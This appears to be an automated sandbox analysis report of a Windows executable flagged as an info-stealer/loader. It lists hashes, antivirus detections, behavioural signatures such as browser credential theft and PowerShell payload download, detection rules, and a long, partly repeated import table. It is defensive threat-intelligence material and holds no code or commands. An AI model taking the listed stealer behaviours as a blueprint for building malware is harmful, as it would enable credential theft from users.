ScreenShot
| Created | 2024.06.17 16:58 | Machine | s1_win7_x6401 |
| Filename | am.exe | ||
| Type | PE32 executable (GUI) Intel 80386, for MS Windows | ||
| AI Score |
|
Behavior Score |
|
| ZERO API | file : clean | ||
| VT API (file) | 37 detected (Penguish, GenericKD, Unsafe, Vcxb, malicious, Rugmi, YzY0OkAwxJ5TJ1ob, Maldldr, rddne, LUMMASTEALER, YXEFLZ, Detected, ai score=81, BScope, Chgt, MxResIcn, PossibleThreat, confidence, 100%) | ||
| md5 | 6cfddd5ce9ca4bb209bd5d8c2cd80025 | ||
| sha256 | 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7 | ||
| ssdeep | 98304:kHRNlpNpt3gSuDdFeznbkRBLwX1Pgedmv72Im/xAgDXMnw4bmVKAHNAXqcMHKYsN:uRrptYDdF8komd8xAUXMwIwHNvcMmN | ||
| imphash | 9e52db722994d0b4983cfb7f894f2a8e | ||
| impfuzzy | 384:CXQz/i384paCsuBuxksRTsNZ2DKgTbFCR:CO/i38QdsouZRTgAbER | ||
Network IP location
Signature (27cnts)
| Level | Description |
|---|---|
| danger | File has been identified by 37 AntiVirus engines on VirusTotal as malicious |
| watch | Attempts to identify installed AV products by installation directory |
| watch | Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe |
| watch | Network communications indicative of possible code injection originated from the process explorer.exe |
| watch | The process powershell.exe wrote an executable file to disk |
| notice | A process created a hidden window |
| notice | Allocates read-write-execute memory (usually to unpack itself) |
| notice | Checks adapter addresses which can be used to detect virtual network interfaces |
| notice | Checks for the Locally Unique Identifier on the system for a suspicious privilege |
| notice | Creates a shortcut to an executable file |
| notice | Creates a suspicious process |
| notice | HTTP traffic contains suspicious features which may be indicative of malware related traffic |
| notice | One or more potentially interesting buffers were extracted |
| notice | Performs some HTTP requests |
| notice | Poweshell is sending data to a remote host |
| notice | Sends data using the HTTP POST Method |
| notice | Steals private information from local Internet browsers |
| notice | URL downloaded by powershell script |
| info | Checks amount of memory in system |
| info | Checks if process is being debugged by a debugger |
| info | Collects information to fingerprint the system (MachineGuid |
| info | Command line console output was observed |
| info | Queries for the computername |
| info | The executable contains unknown PE section names indicative of a packer (could be a false positive) |
| info | The file contains an unknown PE resource name possibly indicative of a packer |
| info | This executable has a PDB path |
| info | Uses Windows APIs to generate a cryptographic key |
Rules (14cnts)
| Level | Name | Description | Collection |
|---|---|---|---|
| danger | Win32_Trojan_Gen_1_0904B0_Zero | Win32 Trojan Emotet | binaries (upload) |
| warning | Generic_Malware_Zero | Generic Malware | binaries (download) |
| warning | Generic_Malware_Zero | Generic Malware | binaries (upload) |
| watch | Antivirus | Contains references to security software | binaries (download) |
| watch | Antivirus | Contains references to security software | binaries (upload) |
| watch | Malicious_Library_Zero | Malicious_Library | binaries (upload) |
| watch | Obsidium_Zero | Obsidium protector file | binaries (upload) |
| watch | UPX_Zero | UPX packed file | binaries (upload) |
| watch | Win32_Trojan_PWS_Net_1_Zero | Win32 Trojan PWS .NET Azorult | binaries (upload) |
| notice | anti_vm_detect | Possibly employs anti-virtualization techniques | binaries (upload) |
| info | IsPE32 | (no description) | binaries (upload) |
| info | OS_Processor_Check_Zero | OS Processor Check | binaries (upload) |
| info | PE_Header_Zero | PE File Signature | binaries (upload) |
| info | PNG_Format_Zero | PNG Format | binaries (download) |
Network (10cnts) ?
Suricata ids
SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2
ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2
PE API
IAT(Import Address Table) Library
WTSAPI32.dll
0x71ea08 WTSQuerySessionInformationW
0x71ea0c WTSFreeMemory
0x71ea10 WTSEnumerateSessionsW
VERSION.dll
0x71e948 VerQueryValueW
0x71e94c GetFileVersionInfoA
0x71e950 VerQueryValueA
0x71e954 GetFileVersionInfoSizeA
0x71e958 GetFileVersionInfoW
0x71e95c GetFileVersionInfoSizeW
IPHLPAPI.DLL
0x71e210 GetAdaptersAddresses
WININET.dll
0x71e964 HttpQueryInfoW
0x71e968 InternetOpenW
0x71e96c InternetOpenUrlW
0x71e970 HttpOpenRequestW
0x71e974 InternetCloseHandle
0x71e978 InternetConnectW
0x71e97c HttpAddRequestHeadersW
0x71e980 InternetQueryDataAvailable
0x71e984 HttpSendRequestW
0x71e988 InternetCrackUrlW
0x71e98c InternetReadFile
0x71e990 InternetGetConnectedStateExW
KERNEL32.dll
0x71e218 CreateSemaphoreW
0x71e21c VirtualQueryEx
0x71e220 SetUnhandledExceptionFilter
0x71e224 GetSystemTime
0x71e228 DuplicateHandle
0x71e22c MulDiv
0x71e230 SetLastError
0x71e234 lstrcmpiW
0x71e238 lstrlenW
0x71e23c CompareStringW
0x71e240 GetCurrentThreadId
0x71e244 GetSystemTimeAsFileTime
0x71e248 WritePrivateProfileStringW
0x71e24c FileTimeToSystemTime
0x71e250 SystemTimeToFileTime
0x71e254 InitializeCriticalSection
0x71e258 MultiByteToWideChar
0x71e25c DeleteFileW
0x71e260 GetPrivateProfileStringW
0x71e264 WideCharToMultiByte
0x71e268 RaiseException
0x71e26c DeleteCriticalSection
0x71e270 InitializeCriticalSectionAndSpinCount
0x71e274 GetLastError
0x71e278 LeaveCriticalSection
0x71e27c EnterCriticalSection
0x71e280 ResetEvent
0x71e284 OpenEventA
0x71e288 SetEvent
0x71e28c GetCurrentProcessId
0x71e290 CreateEventA
0x71e294 WaitForSingleObjectEx
0x71e298 GetModuleFileNameW
0x71e29c GetVersionExW
0x71e2a0 CloseHandle
0x71e2a4 GetCurrentProcess
0x71e2a8 GetModuleHandleW
0x71e2ac GetProcAddress
0x71e2b0 FindResourceExW
0x71e2b4 FindResourceW
0x71e2b8 LoadResource
0x71e2bc LockResource
0x71e2c0 SizeofResource
0x71e2c4 GetProcessHeap
0x71e2c8 HeapAlloc
0x71e2cc HeapFree
0x71e2d0 HeapReAlloc
0x71e2d4 HeapSize
0x71e2d8 HeapDestroy
0x71e2dc CreateThread
0x71e2e0 ResumeThread
0x71e2e4 RtlCaptureContext
0x71e2e8 WriteConsoleW
0x71e2ec SetEndOfFile
0x71e2f0 SetStdHandle
0x71e2f4 SetEnvironmentVariableW
0x71e2f8 SetEnvironmentVariableA
0x71e2fc FreeEnvironmentStringsW
0x71e300 GetEnvironmentStringsW
0x71e304 GetCommandLineA
0x71e308 FindFirstFileExW
0x71e30c ReadConsoleW
0x71e310 GetOEMCP
0x71e314 IsValidCodePage
0x71e318 SetFilePointerEx
0x71e31c FlushFileBuffers
0x71e320 EnumSystemLocalesW
0x71e324 IsValidLocale
0x71e328 GetConsoleMode
0x71e32c GetConsoleCP
0x71e330 GetStdHandle
0x71e334 FreeLibraryAndExitThread
0x71e338 GetACP
0x71e33c GetModuleHandleExW
0x71e340 RtlUnwind
0x71e344 GetStringTypeExA
0x71e348 GetUserDefaultLCID
0x71e34c LCMapStringA
0x71e350 GetStringTypeExW
0x71e354 TerminateProcess
0x71e358 UnhandledExceptionFilter
0x71e35c LoadLibraryExA
0x71e360 IsProcessorFeaturePresent
0x71e364 FlushInstructionCache
0x71e368 InterlockedPushEntrySList
0x71e36c InterlockedPopEntrySList
0x71e370 InitializeSListHead
0x71e374 IsDebuggerPresent
0x71e378 CreateWaitableTimerA
0x71e37c GetCPInfo
0x71e380 LCMapStringW
0x71e384 EncodePointer
0x71e388 GetStringTypeW
0x71e38c OutputDebugStringW
0x71e390 lstrcmpiA
0x71e394 GetSystemDirectoryA
0x71e398 GetSystemDirectoryW
0x71e39c GlobalMemoryStatusEx
0x71e3a0 CancelIo
0x71e3a4 SetThreadPriority
0x71e3a8 GetProcessAffinityMask
0x71e3ac SetProcessAffinityMask
0x71e3b0 SetThreadAffinityMask
0x71e3b4 FindResourceA
0x71e3b8 GetWindowsDirectoryA
0x71e3bc DeleteFileA
0x71e3c0 RemoveDirectoryA
0x71e3c4 GetComputerNameA
0x71e3c8 GetTempPathW
0x71e3cc GetWindowsDirectoryW
0x71e3d0 VirtualFree
0x71e3d4 VirtualAlloc
0x71e3d8 CompareFileTime
0x71e3dc OpenProcess
0x71e3e0 GetSystemDefaultLCID
0x71e3e4 GetGeoInfoW
0x71e3e8 GetUserGeoID
0x71e3ec GetSystemPowerStatus
0x71e3f0 SetErrorMode
0x71e3f4 ExitThread
0x71e3f8 GetDiskFreeSpaceA
0x71e3fc CreateFileA
0x71e400 LocalAlloc
0x71e404 GetCurrentDirectoryA
0x71e408 CreateDirectoryA
0x71e40c CreateMutexA
0x71e410 ReleaseMutex
0x71e414 GetVersionExA
0x71e418 LoadLibraryA
0x71e41c GetComputerNameExW
0x71e420 DeviceIoControl
0x71e424 GetDriveTypeW
0x71e428 GetTempPathA
0x71e42c GlobalMemoryStatus
0x71e430 GetModuleHandleA
0x71e434 GetTickCount
0x71e438 GetTimeZoneInformation
0x71e43c SystemTimeToTzSpecificLocalTime
0x71e440 PeekNamedPipe
0x71e444 CreatePipe
0x71e448 Process32NextW
0x71e44c Process32FirstW
0x71e450 CreateToolhelp32Snapshot
0x71e454 ReadFile
0x71e458 QueryPerformanceFrequency
0x71e45c QueryPerformanceCounter
0x71e460 SetWaitableTimer
0x71e464 WaitForMultipleObjects
0x71e468 InterlockedExchangeAdd
0x71e46c TerminateThread
0x71e470 VerSetConditionMask
0x71e474 VerifyVersionInfoW
0x71e478 TlsFree
0x71e47c TlsGetValue
0x71e480 TlsAlloc
0x71e484 TlsSetValue
0x71e488 lstrlenA
0x71e48c ExitProcess
0x71e490 GetNumberFormatW
0x71e494 GetLocaleInfoW
0x71e498 InterlockedExchange
0x71e49c FindNextFileW
0x71e4a0 FindFirstFileW
0x71e4a4 GetFullPathNameW
0x71e4a8 FindClose
0x71e4ac RemoveDirectoryW
0x71e4b0 GlobalUnlock
0x71e4b4 GlobalAlloc
0x71e4b8 lstrcmpA
0x71e4bc GetModuleFileNameA
0x71e4c0 SetFileTime
0x71e4c4 SetFilePointer
0x71e4c8 GetFileSize
0x71e4cc GetFileAttributesExW
0x71e4d0 UnmapViewOfFile
0x71e4d4 MapViewOfFile
0x71e4d8 CreateFileMappingW
0x71e4dc LocalFree
0x71e4e0 FormatMessageW
0x71e4e4 GetCurrentThread
0x71e4e8 LoadLibraryW
0x71e4ec GetTimeFormatW
0x71e4f0 GetDateFormatW
0x71e4f4 WaitForMultipleObjectsEx
0x71e4f8 GlobalLock
0x71e4fc CreateSemaphoreA
0x71e500 ReleaseSemaphore
0x71e504 GetComputerNameW
0x71e508 WriteFile
0x71e50c CreateFileW
0x71e510 WaitForSingleObject
0x71e514 HeapCreate
0x71e518 DecodePointer
0x71e51c FormatMessageA
0x71e520 GetCommandLineW
0x71e524 CreateProcessW
0x71e528 GetStartupInfoW
0x71e52c GetLocalTime
0x71e530 InterlockedDecrement
0x71e534 InterlockedIncrement
0x71e538 LoadLibraryExW
0x71e53c FreeLibrary
0x71e540 Sleep
0x71e544 GetPrivateProfileStructW
0x71e548 WritePrivateProfileStructW
0x71e54c GetFileType
0x71e550 CreateEventW
0x71e554 GlobalFree
0x71e558 GetSystemInfo
USER32.dll
0x71e6d0 GetDlgItem
0x71e6d4 SendMessageW
0x71e6d8 GetWindowRect
0x71e6dc SetWindowLongW
0x71e6e0 LoadImageW
0x71e6e4 CheckRadioButton
0x71e6e8 ShowWindow
0x71e6ec ScreenToClient
0x71e6f0 MoveWindow
0x71e6f4 IsWindow
0x71e6f8 IsDlgButtonChecked
0x71e6fc EnableWindow
0x71e700 DefWindowProcW
0x71e704 CallWindowProcW
0x71e708 GetParent
0x71e70c DestroyIcon
0x71e710 LoadIconW
0x71e714 SetDlgItemTextW
0x71e718 EnumWindows
0x71e71c SetWindowPos
0x71e720 MapWindowPoints
0x71e724 GetClientRect
0x71e728 GetMonitorInfoW
0x71e72c MonitorFromWindow
0x71e730 GetWindow
0x71e734 SetWindowTextW
0x71e738 DestroyWindow
0x71e73c keybd_event
0x71e740 OffsetRect
0x71e744 DrawTextW
0x71e748 ReleaseDC
0x71e74c GetDC
0x71e750 CharNextW
0x71e754 GetWindowTextW
0x71e758 GetWindowTextLengthW
0x71e75c CreateWindowExW
0x71e760 SystemParametersInfoW
0x71e764 LoadCursorW
0x71e768 GetClassNameW
0x71e76c SetRectEmpty
0x71e770 InvalidateRect
0x71e774 UpdateWindow
0x71e778 PtInRect
0x71e77c GetCursorPos
0x71e780 GetDlgCtrlID
0x71e784 ReleaseCapture
0x71e788 LoadStringA
0x71e78c IsWindowVisible
0x71e790 GetWindowLongW
0x71e794 UnregisterClassW
0x71e798 GetClipboardData
0x71e79c IsClipboardFormatAvailable
0x71e7a0 CloseClipboard
0x71e7a4 SetClipboardData
0x71e7a8 EmptyClipboard
0x71e7ac OpenClipboard
0x71e7b0 GetDlgItemTextW
0x71e7b4 BringWindowToTop
0x71e7b8 CharLowerA
0x71e7bc CharLowerW
0x71e7c0 DrawTextExW
0x71e7c4 GetSysColorBrush
0x71e7c8 MapDialogRect
0x71e7cc LoadBitmapW
0x71e7d0 SetWindowPlacement
0x71e7d4 GetWindowPlacement
0x71e7d8 GetMenuItemCount
0x71e7dc CheckMenuItem
0x71e7e0 IsIconic
0x71e7e4 SwitchToThisWindow
0x71e7e8 TranslateAcceleratorW
0x71e7ec MonitorFromRect
0x71e7f0 EnableMenuItem
0x71e7f4 GetTopWindow
0x71e7f8 PostQuitMessage
0x71e7fc LoadAcceleratorsW
0x71e800 GetClassLongW
0x71e804 SetClassLongW
0x71e808 DeleteMenu
0x71e80c CheckDlgButton
0x71e810 EndDialog
0x71e814 IsMenu
0x71e818 GetMenuDefaultItem
0x71e81c LoadMenuW
0x71e820 GetSubMenu
0x71e824 SetForegroundWindow
0x71e828 CreateIconIndirect
0x71e82c SetMenuDefaultItem
0x71e830 RegisterWindowMessageW
0x71e834 InsertMenuItemW
0x71e838 GetMenuItemInfoW
0x71e83c SetMenuItemInfoW
0x71e840 CreateMenu
0x71e844 CopyRect
0x71e848 GetDesktopWindow
0x71e84c GetMenu
0x71e850 LoadStringW
0x71e854 GetForegroundWindow
0x71e858 CreateDialogParamW
0x71e85c DialogBoxParamW
0x71e860 PeekMessageW
0x71e864 GetMessageW
0x71e868 TranslateMessage
0x71e86c DispatchMessageW
0x71e870 RegisterClassW
0x71e874 GetClassInfoW
0x71e878 GetActiveWindow
0x71e87c MessageBoxW
0x71e880 FindWindowW
0x71e884 CallNextHookEx
0x71e888 SetWindowsHookExW
0x71e88c UnhookWindowsHookEx
0x71e890 GetKeyboardState
0x71e894 DestroyCursor
0x71e898 DestroyMenu
0x71e89c MonitorFromPoint
0x71e8a0 CreatePopupMenu
0x71e8a4 TrackPopupMenu
0x71e8a8 AppendMenuW
0x71e8ac GetDoubleClickTime
0x71e8b0 GetMessageTime
0x71e8b4 KillTimer
0x71e8b8 SetTimer
0x71e8bc RedrawWindow
0x71e8c0 IntersectRect
0x71e8c4 DrawEdge
0x71e8c8 SetWindowRgn
0x71e8cc GetScrollPos
0x71e8d0 SetScrollPos
0x71e8d4 GetScrollRange
0x71e8d8 SetScrollRange
0x71e8dc GetScrollInfo
0x71e8e0 SetScrollInfo
0x71e8e4 ShowScrollBar
0x71e8e8 GetClassInfoExW
0x71e8ec RegisterClassExW
0x71e8f0 GetKeyState
0x71e8f4 GetSystemMetrics
0x71e8f8 InflateRect
0x71e8fc PostMessageW
0x71e900 GetWindowDC
0x71e904 IsCharAlphaNumericW
0x71e908 BeginPaint
0x71e90c EndPaint
0x71e910 FillRect
0x71e914 IsWindowEnabled
0x71e918 GetSysColor
0x71e91c GetFocus
0x71e920 DrawFocusRect
0x71e924 SetCursor
0x71e928 SetFocus
0x71e92c SetCapture
0x71e930 GetCapture
0x71e934 wsprintfA
0x71e938 GetUserObjectSecurity
0x71e93c EnumDisplayDevicesW
0x71e940 EnumDisplaySettingsExW
GDI32.dll
0x71e144 GetDIBColorTable
0x71e148 StretchBlt
0x71e14c StartDocW
0x71e150 AbortDoc
0x71e154 EndDoc
0x71e158 StartPage
0x71e15c EndPage
0x71e160 GetBitmapBits
0x71e164 CreatePatternBrush
0x71e168 Ellipse
0x71e16c GetBitmapDimensionEx
0x71e170 SetBitmapDimensionEx
0x71e174 CreateBitmap
0x71e178 Polyline
0x71e17c DPtoLP
0x71e180 GetDeviceCaps
0x71e184 GetTextMetricsW
0x71e188 GetCurrentObject
0x71e18c GetBkColor
0x71e190 GetTextColor
0x71e194 Rectangle
0x71e198 SetPixel
0x71e19c LineTo
0x71e1a0 MoveToEx
0x71e1a4 RoundRect
0x71e1a8 CreatePen
0x71e1ac ExtTextOutW
0x71e1b0 CreateRoundRectRgn
0x71e1b4 BitBlt
0x71e1b8 CreateCompatibleDC
0x71e1bc CreateCompatibleBitmap
0x71e1c0 SetViewportOrgEx
0x71e1c4 CreateSolidBrush
0x71e1c8 GetTextExtentExPointW
0x71e1cc SaveDC
0x71e1d0 RestoreDC
0x71e1d4 SetBkColor
0x71e1d8 TextOutW
0x71e1dc GetTextExtentPoint32W
0x71e1e0 SetBkMode
0x71e1e4 SetTextColor
0x71e1e8 GetStockObject
0x71e1ec CreateFontIndirectW
0x71e1f0 DeleteDC
0x71e1f4 SelectObject
0x71e1f8 GetObjectW
0x71e1fc CreateDIBSection
0x71e200 DeleteObject
0x71e204 CreateDCW
0x71e208 ExtEscape
COMDLG32.dll
0x71e110 GetOpenFileNameW
0x71e114 PrintDlgExW
0x71e118 GetSaveFileNameW
ADVAPI32.dll
0x71e000 RegQueryValueExW
0x71e004 CryptGenRandom
0x71e008 CryptReleaseContext
0x71e00c CryptAcquireContextA
0x71e010 RegEnumKeyExW
0x71e014 RegQueryInfoKeyW
0x71e018 SetSecurityDescriptorDacl
0x71e01c InitializeSecurityDescriptor
0x71e020 RegDeleteValueW
0x71e024 RegCreateKeyExW
0x71e028 RegCreateKeyW
0x71e02c RegDeleteKeyW
0x71e030 RegSetValueExW
0x71e034 RegOpenKeyExW
0x71e038 RegCloseKey
0x71e03c GetTokenInformation
0x71e040 OpenProcessToken
0x71e044 GetUserNameW
0x71e048 GetLengthSid
0x71e04c InitializeAcl
0x71e050 AddAccessAllowedAce
0x71e054 SetSecurityDescriptorGroup
0x71e058 AllocateAndInitializeSid
0x71e05c FreeSid
0x71e060 OpenSCManagerW
0x71e064 EnumServicesStatusExW
0x71e068 CloseServiceHandle
0x71e06c RegEnumValueW
0x71e070 RegQueryValueExA
0x71e074 OpenServiceW
0x71e078 QueryServiceConfigW
0x71e07c EnumServicesStatusW
0x71e080 OpenThreadToken
0x71e084 ImpersonateSelf
0x71e088 LookupAccountSidW
0x71e08c GetSecurityDescriptorOwner
0x71e090 IsValidSid
0x71e094 LookupPrivilegeValueW
0x71e098 AdjustTokenPrivileges
0x71e09c GetSidSubAuthorityCount
0x71e0a0 GetSidLengthRequired
0x71e0a4 InitializeSid
0x71e0a8 GetSidIdentifierAuthority
0x71e0ac GetSidSubAuthority
0x71e0b0 LsaOpenPolicy
0x71e0b4 LsaQueryInformationPolicy
0x71e0b8 LsaFreeMemory
0x71e0bc CreateServiceA
0x71e0c0 DeleteService
0x71e0c4 OpenServiceA
0x71e0c8 StartServiceA
0x71e0cc ControlService
0x71e0d0 OpenSCManagerA
0x71e0d4 RegOpenKeyExA
0x71e0d8 ConvertStringSidToSidW
0x71e0dc RegLoadKeyW
0x71e0e0 RegUnLoadKeyW
0x71e0e4 RevertToSelf
0x71e0e8 AccessCheck
0x71e0ec IsValidSecurityDescriptor
0x71e0f0 SetSecurityDescriptorOwner
SHELL32.dll
0x71e674 DragQueryFileW
0x71e678 DragFinish
0x71e67c DuplicateIcon
0x71e680 Shell_NotifyIconW
0x71e684 ShellExecuteW
0x71e688 DoEnvironmentSubstW
0x71e68c SHGetSpecialFolderPathW
0x71e690 ShellExecuteExW
ole32.dll
0x71ea18 PropVariantClear
0x71ea1c CoSetProxyBlanket
0x71ea20 CoInitialize
0x71ea24 CoTaskMemAlloc
0x71ea28 CoInitializeSecurity
0x71ea2c CoUninitialize
0x71ea30 CoInitializeEx
0x71ea34 CoTaskMemFree
0x71ea38 CoCreateInstance
0x71ea3c CoTaskMemRealloc
OLEAUT32.dll
0x71e580 SafeArrayGetElement
0x71e584 SystemTimeToVariantTime
0x71e588 VariantInit
0x71e58c VariantClear
0x71e590 SysAllocString
0x71e594 SysFreeString
0x71e598 SafeArrayUnaccessData
0x71e59c SysAllocStringLen
0x71e5a0 VarUI4FromStr
0x71e5a4 VariantChangeType
0x71e5a8 VarBstrFromR8
0x71e5ac SafeArrayGetUBound
0x71e5b0 SafeArrayGetLBound
0x71e5b4 SafeArrayGetElemsize
0x71e5b8 SafeArrayGetVartype
0x71e5bc SafeArrayAccessData
0x71e5c0 SysAllocStringByteLen
0x71e5c4 SysStringByteLen
0x71e5c8 VariantCopy
0x71e5cc VarUdateFromDate
0x71e5d0 VariantTimeToSystemTime
0x71e5d4 SysStringLen
RPCRT4.dll
0x71e5fc UuidCreate
0x71e600 UuidToStringW
0x71e604 RpcStringFreeW
SETUPAPI.dll
0x71e60c SetupDiCallClassInstaller
0x71e610 CM_Get_DevNode_Registry_PropertyW
0x71e614 CM_Open_DevNode_Key
0x71e618 CM_Get_Parent
0x71e61c SetupOpenFileQueue
0x71e620 SetupScanFileQueueW
0x71e624 SetupDiSetDeviceInstallParamsW
0x71e628 SetupDiGetDeviceInstallParamsW
0x71e62c SetupDiSetSelectedDriverW
0x71e630 SetupDiEnumDeviceInfo
0x71e634 SetupDiGetSelectedDriverW
0x71e638 CM_Connect_MachineW
0x71e63c CM_Locate_DevNode_ExW
0x71e640 CM_Get_Child_Ex
0x71e644 CM_Get_DevNode_Registry_Property_ExW
0x71e648 CM_Get_Sibling_Ex
0x71e64c SetupDiDestroyDriverInfoList
0x71e650 SetupDiBuildDriverInfoList
0x71e654 SetupDiOpenDevRegKey
0x71e658 SetupDiGetDeviceInstanceIdW
0x71e65c SetupDiGetDeviceRegistryPropertyW
0x71e660 SetupDiGetDeviceRegistryPropertyA
0x71e664 SetupCloseFileQueue
0x71e668 SetupDiDestroyDeviceInfoList
0x71e66c SetupDiGetClassDevsW
POWRPROF.dll
0x71e5dc GetActivePwrScheme
0x71e5e0 ReadPwrScheme
0x71e5e4 GetPwrCapabilities
PSAPI.DLL
0x71e5ec GetProcessImageFileNameW
0x71e5f0 GetModuleFileNameExW
0x71e5f4 GetProcessMemoryInfo
WINMM.dll
0x71e998 waveOutMessage
0x71e99c waveOutGetDevCapsW
0x71e9a0 waveInGetDevCapsW
0x71e9a4 waveOutGetNumDevs
0x71e9a8 waveInGetNumDevs
0x71e9ac waveInMessage
NETAPI32.dll
0x71e56c NetWkstaGetInfo
0x71e570 NetUserGetInfo
0x71e574 NetUserModalsGet
0x71e578 NetApiBufferFree
SHLWAPI.dll
0x71e698 PathFileExistsW
0x71e69c PathAppendW
0x71e6a0 PathAddExtensionW
0x71e6a4 PathRemoveFileSpecW
0x71e6a8 PathIsDirectoryW
0x71e6ac PathStripPathW
0x71e6b0 PathMatchSpecW
0x71e6b4 PathRemoveExtensionW
0x71e6b8 PathCombineW
0x71e6bc PathFindFileNameA
0x71e6c0 PathCanonicalizeW
0x71e6c4 StrFormatByteSizeW
0x71e6c8 PathIsDirectoryEmptyW
MSIMG32.dll
0x71e560 AlphaBlend
0x71e564 TransparentBlt
COMCTL32.dll
0x71e0f8 DestroyPropertySheetPage
0x71e0fc _TrackMouseEvent
0x71e100 InitCommonControlsEx
0x71e104 PropertySheetW
0x71e108 CreatePropertySheetPageW
CRYPT32.dll
0x71e120 CryptQueryObject
0x71e124 CertGetNameStringW
0x71e128 CertCloseStore
0x71e12c CryptMsgClose
0x71e130 CertFindCertificateInStore
0x71e134 CryptDecodeObject
0x71e138 CryptMsgGetParam
0x71e13c CertFreeCertificateContext
WINTRUST.dll
0x71e9cc WinVerifyTrust
WS2_32.dll
0x71e9d4 WSALookupServiceEnd
0x71e9d8 WSAGetLastError
0x71e9dc WSALookupServiceNextW
0x71e9e0 WSACleanup
0x71e9e4 WSAStartup
0x71e9e8 WSALookupServiceBeginW
0x71e9ec inet_addr
0x71e9f0 htonl
0x71e9f4 inet_ntoa
0x71e9f8 WSAAddressToStringW
0x71e9fc htons
0x71ea00 getnameinfo
WINSPOOL.DRV
0x71e9b4 EnumPrintersW
0x71e9b8 None
0x71e9bc ClosePrinter
0x71e9c0 OpenPrinterW
0x71e9c4 GetPrinterDriverW
EAT(Export Address Table) is none
WTSAPI32.dll
0x71ea08 WTSQuerySessionInformationW
0x71ea0c WTSFreeMemory
0x71ea10 WTSEnumerateSessionsW
VERSION.dll
0x71e948 VerQueryValueW
0x71e94c GetFileVersionInfoA
0x71e950 VerQueryValueA
0x71e954 GetFileVersionInfoSizeA
0x71e958 GetFileVersionInfoW
0x71e95c GetFileVersionInfoSizeW
IPHLPAPI.DLL
0x71e210 GetAdaptersAddresses
WININET.dll
0x71e964 HttpQueryInfoW
0x71e968 InternetOpenW
0x71e96c InternetOpenUrlW
0x71e970 HttpOpenRequestW
0x71e974 InternetCloseHandle
0x71e978 InternetConnectW
0x71e97c HttpAddRequestHeadersW
0x71e980 InternetQueryDataAvailable
0x71e984 HttpSendRequestW
0x71e988 InternetCrackUrlW
0x71e98c InternetReadFile
0x71e990 InternetGetConnectedStateExW
KERNEL32.dll
0x71e218 CreateSemaphoreW
0x71e21c VirtualQueryEx
0x71e220 SetUnhandledExceptionFilter
0x71e224 GetSystemTime
0x71e228 DuplicateHandle
0x71e22c MulDiv
0x71e230 SetLastError
0x71e234 lstrcmpiW
0x71e238 lstrlenW
0x71e23c CompareStringW
0x71e240 GetCurrentThreadId
0x71e244 GetSystemTimeAsFileTime
0x71e248 WritePrivateProfileStringW
0x71e24c FileTimeToSystemTime
0x71e250 SystemTimeToFileTime
0x71e254 InitializeCriticalSection
0x71e258 MultiByteToWideChar
0x71e25c DeleteFileW
0x71e260 GetPrivateProfileStringW
0x71e264 WideCharToMultiByte
0x71e268 RaiseException
0x71e26c DeleteCriticalSection
0x71e270 InitializeCriticalSectionAndSpinCount
0x71e274 GetLastError
0x71e278 LeaveCriticalSection
0x71e27c EnterCriticalSection
0x71e280 ResetEvent
0x71e284 OpenEventA
0x71e288 SetEvent
0x71e28c GetCurrentProcessId
0x71e290 CreateEventA
0x71e294 WaitForSingleObjectEx
0x71e298 GetModuleFileNameW
0x71e29c GetVersionExW
0x71e2a0 CloseHandle
0x71e2a4 GetCurrentProcess
0x71e2a8 GetModuleHandleW
0x71e2ac GetProcAddress
0x71e2b0 FindResourceExW
0x71e2b4 FindResourceW
0x71e2b8 LoadResource
0x71e2bc LockResource
0x71e2c0 SizeofResource
0x71e2c4 GetProcessHeap
0x71e2c8 HeapAlloc
0x71e2cc HeapFree
0x71e2d0 HeapReAlloc
0x71e2d4 HeapSize
0x71e2d8 HeapDestroy
0x71e2dc CreateThread
0x71e2e0 ResumeThread
0x71e2e4 RtlCaptureContext
0x71e2e8 WriteConsoleW
0x71e2ec SetEndOfFile
0x71e2f0 SetStdHandle
0x71e2f4 SetEnvironmentVariableW
0x71e2f8 SetEnvironmentVariableA
0x71e2fc FreeEnvironmentStringsW
0x71e300 GetEnvironmentStringsW
0x71e304 GetCommandLineA
0x71e308 FindFirstFileExW
0x71e30c ReadConsoleW
0x71e310 GetOEMCP
0x71e314 IsValidCodePage
0x71e318 SetFilePointerEx
0x71e31c FlushFileBuffers
0x71e320 EnumSystemLocalesW
0x71e324 IsValidLocale
0x71e328 GetConsoleMode
0x71e32c GetConsoleCP
0x71e330 GetStdHandle
0x71e334 FreeLibraryAndExitThread
0x71e338 GetACP
0x71e33c GetModuleHandleExW
0x71e340 RtlUnwind
0x71e344 GetStringTypeExA
0x71e348 GetUserDefaultLCID
0x71e34c LCMapStringA
0x71e350 GetStringTypeExW
0x71e354 TerminateProcess
0x71e358 UnhandledExceptionFilter
0x71e35c LoadLibraryExA
0x71e360 IsProcessorFeaturePresent
0x71e364 FlushInstructionCache
0x71e368 InterlockedPushEntrySList
0x71e36c InterlockedPopEntrySList
0x71e370 InitializeSListHead
0x71e374 IsDebuggerPresent
0x71e378 CreateWaitableTimerA
0x71e37c GetCPInfo
0x71e380 LCMapStringW
0x71e384 EncodePointer
0x71e388 GetStringTypeW
0x71e38c OutputDebugStringW
0x71e390 lstrcmpiA
0x71e394 GetSystemDirectoryA
0x71e398 GetSystemDirectoryW
0x71e39c GlobalMemoryStatusEx
0x71e3a0 CancelIo
0x71e3a4 SetThreadPriority
0x71e3a8 GetProcessAffinityMask
0x71e3ac SetProcessAffinityMask
0x71e3b0 SetThreadAffinityMask
0x71e3b4 FindResourceA
0x71e3b8 GetWindowsDirectoryA
0x71e3bc DeleteFileA
0x71e3c0 RemoveDirectoryA
0x71e3c4 GetComputerNameA
0x71e3c8 GetTempPathW
0x71e3cc GetWindowsDirectoryW
0x71e3d0 VirtualFree
0x71e3d4 VirtualAlloc
0x71e3d8 CompareFileTime
0x71e3dc OpenProcess
0x71e3e0 GetSystemDefaultLCID
0x71e3e4 GetGeoInfoW
0x71e3e8 GetUserGeoID
0x71e3ec GetSystemPowerStatus
0x71e3f0 SetErrorMode
0x71e3f4 ExitThread
0x71e3f8 GetDiskFreeSpaceA
0x71e3fc CreateFileA
0x71e400 LocalAlloc
0x71e404 GetCurrentDirectoryA
0x71e408 CreateDirectoryA
0x71e40c CreateMutexA
0x71e410 ReleaseMutex
0x71e414 GetVersionExA
0x71e418 LoadLibraryA
0x71e41c GetComputerNameExW
0x71e420 DeviceIoControl
0x71e424 GetDriveTypeW
0x71e428 GetTempPathA
0x71e42c GlobalMemoryStatus
